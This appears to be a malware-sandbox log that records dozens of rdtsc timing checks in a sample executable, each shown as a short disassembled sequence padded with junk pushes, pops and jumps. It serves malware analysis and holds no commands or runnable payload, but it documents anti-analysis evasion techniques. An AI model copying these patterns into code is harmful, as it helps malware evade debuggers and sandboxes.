Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4CAD95 second address: 4CAD99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4CAD99 second address: 4CADB6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F6BF4F65162h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4CADB6 second address: 4CADBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4CADBE second address: 4CADCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F6BF4F65156h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4CADCD second address: 4CADD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4CE80C second address: 4CE810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4DC51F second address: 4DC529 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6BF4B2C35Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4DF367 second address: 4DF37A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6BF4F6515Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4DF37A second address: 4DF38E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4B2C35Ah 0x00000009 jng 00007F6BF4B2C356h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4DF38E second address: 4DF392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4E2231 second address: 4E223B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4E223B second address: 4E227C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6BF4F6515Dh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c jmp 00007F6BF4F6515Fh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F6BF4F65167h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4E227C second address: 4E229C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F6BF4B2C35Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F6BF4B2C35Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4E229C second address: 4E22D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F6BF4F65156h 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e pushad 0x0000000f jng 00007F6BF4F65156h 0x00000015 jmp 00007F6BF4F65163h 0x0000001a jmp 00007F6BF4F6515Ah 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4E90B8 second address: 4E90BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4E90BE second address: 4E90C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4E90C2 second address: 4E90C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4E79D1 second address: 4E79F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6BF4F65169h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4E7E15 second address: 4E7E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F6BF4B2C35Fh 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4E7E2F second address: 4E7E35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4E7E35 second address: 4E7E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4E7E39 second address: 4E7E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4E80F6 second address: 4E8102 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6BF4B2C35Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4E83E1 second address: 4E83E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4E83E7 second address: 4E83FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jno 00007F6BF4B2C356h 0x0000000f jnp 00007F6BF4B2C356h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4E83FE second address: 4E8403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4EE2F9 second address: 4EE2FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5002D3 second address: 5002D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5002D7 second address: 500317 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6BF4B2C363h 0x0000000b popad 0x0000000c jbe 00007F6BF4B2C389h 0x00000012 jbe 00007F6BF4B2C36Ch 0x00000018 jmp 00007F6BF4B2C366h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 500317 second address: 50031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5000FB second address: 5000FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5000FF second address: 500141 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6BF4F65156h 0x00000008 jmp 00007F6BF4F65167h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F6BF4F65165h 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a jno 00007F6BF4F65156h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 500141 second address: 500178 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C364h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6BF4B2C35Ah 0x00000011 jmp 00007F6BF4B2C362h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4F972B second address: 4F973D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6BF4F65156h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4F973D second address: 4F9774 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6BF4B2C367h 0x00000013 jmp 00007F6BF4B2C362h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4F9774 second address: 4F978B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F6BF4F6515Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4F978B second address: 4F978F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4F978F second address: 4F97C6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6BF4F65156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6BF4F65165h 0x00000011 jmp 00007F6BF4F65166h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4F97C6 second address: 4F97D0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6BF4B2C356h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 50D53F second address: 50D550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5276A0 second address: 5276A9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5276A9 second address: 5276AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5269F3 second address: 526A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6BF4B2C35Bh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 526CEE second address: 526D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6BF4F65167h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F6BF4F65156h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 526D14 second address: 526D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 526EAA second address: 526EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F6BF4F6515Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 526EBF second address: 526EC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5271B1 second address: 5271B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 52734E second address: 527354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 528CA0 second address: 528CAB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 528CAB second address: 528CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 528CB0 second address: 528CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4F6515Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 528CC0 second address: 528CC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 528CC4 second address: 528CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007F6BF4F65156h 0x0000000d js 00007F6BF4F65156h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 52B8DC second address: 52B8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 52B8E1 second address: 52B8EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F6BF4F65156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 52B9A4 second address: 52BA31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6BF4B2C35Fh 0x00000009 popad 0x0000000a jmp 00007F6BF4B2C35Bh 0x0000000f popad 0x00000010 nop 0x00000011 sub edx, 1995C190h 0x00000017 push 00000004h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F6BF4B2C358h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 add dword ptr [ebp+122D3427h], eax 0x00000039 call 00007F6BF4B2C359h 0x0000003e jmp 00007F6BF4B2C35Ch 0x00000043 push eax 0x00000044 jmp 00007F6BF4B2C35Ah 0x00000049 mov eax, dword ptr [esp+04h] 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F6BF4B2C362h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 52BA31 second address: 52BA35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 52BA35 second address: 52BA3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 52BA3E second address: 52BA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jp 00007F6BF4F65164h 0x0000000e pushad 0x0000000f jne 00007F6BF4F65156h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 530A5F second address: 530A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6BF4B2C356h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5440DDD second address: 5440DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6BF4F65167h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5440DFE second address: 5440E31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, E2BAh 0x00000007 call 00007F6BF4B2C35Bh 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 jmp 00007F6BF4B2C365h 0x00000018 push eax 0x00000019 push edx 0x0000001a movzx ecx, dx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5440E31 second address: 5440E5F instructions: 0x00000000 rdtsc 0x00000002 call 00007F6BF4F65163h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6BF4F65162h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5480008 second address: 548000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5410114 second address: 5410122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F6515Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5410122 second address: 5410134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4B2C35Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5410134 second address: 541015F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F6515Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6BF4F65165h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54101A7 second address: 54101B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4B2C35Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54101B9 second address: 54101BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5430A64 second address: 5430A76 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cx, bx 0x0000000f push edi 0x00000010 pop eax 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54306D3 second address: 54306D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5430619 second address: 5430632 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C35Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5430632 second address: 5430636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5430636 second address: 543063A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 543063A second address: 5430640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54303AF second address: 54303C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4B2C364h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54303C7 second address: 54303CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54303CB second address: 54303EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6BF4B2C366h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54303EE second address: 54303F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54303F2 second address: 54303F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54303F8 second address: 54303FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54303FE second address: 5430402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5430402 second address: 5430429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F65168h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5430429 second address: 543042D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 543042D second address: 5430433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5430EF1 second address: 5430F05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4B2C360h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5430F05 second address: 5430F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5470F3D second address: 5470F65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5470F65 second address: 5470F96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F65162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6BF4F65167h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 545022C second address: 545024D instructions: 0x00000000 rdtsc 0x00000002 mov ax, 277Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c jmp 00007F6BF4B2C35Eh 0x00000011 and dword ptr [eax], 00000000h 0x00000014 pushad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
